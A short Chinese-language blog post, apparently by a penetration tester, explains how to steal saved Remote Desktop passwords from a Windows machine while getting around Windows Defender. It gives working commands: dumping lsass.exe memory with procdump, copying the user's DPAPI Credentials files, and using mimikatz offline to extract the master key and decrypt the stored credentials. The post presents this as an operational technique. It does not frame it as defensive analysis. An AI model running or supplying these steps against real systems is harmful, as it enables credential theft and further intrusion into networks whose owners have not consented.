今天遇到了新的机器,要抓取该机器保存在本地的远程桌面连接密码。但上面有我没办法绕过的Windows defender,所以我想了一下,最终获得了我需要的密码。

如果看不懂,请先预习上一篇文章 mimikatz获取本地Credentials

步骤:

  1. dump目标机器的lsass.exe的内存
  2. download 目标的Credentials文件
  3. 用mimikatz获取guidMasterKey
  4. 用mimikatz获取guidMasterKey对应的MasterKey
  5. 用mimikatz把MasterKey作为密钥解密Credentials文件

  1. procdump64.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
  2. 目标Credentials文件在c:\users\<username>\appdata\local\microsoft\credentials\
  3. 先用mimikatz的命令sekurlsa::minidump dump.dmp载入到dump回来的内存文件,然后执行mimikatz命令dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\C683A6C121208458166FA7833F8EC83E其实载入到dump回来的文件后,剩下的操作就跟第一篇一样了。我们主要是通过利用mimikatz把dump回来的内存文件里面的MasterKey找出来,然后用这个MasterKey来解密download回来的Credentials文件。
  4. mimikatz sekurlsa::dpapi然后找到第三步中得到的guidMasterKey所对应的值 所 对应的MasterKey的值。
  5. dpapi::cred /in:要解密的Credentials文件的路径 /masterkey:得到的MasterKey该步骤中的Credentials文件路径可以是绝对路径或是相对路径。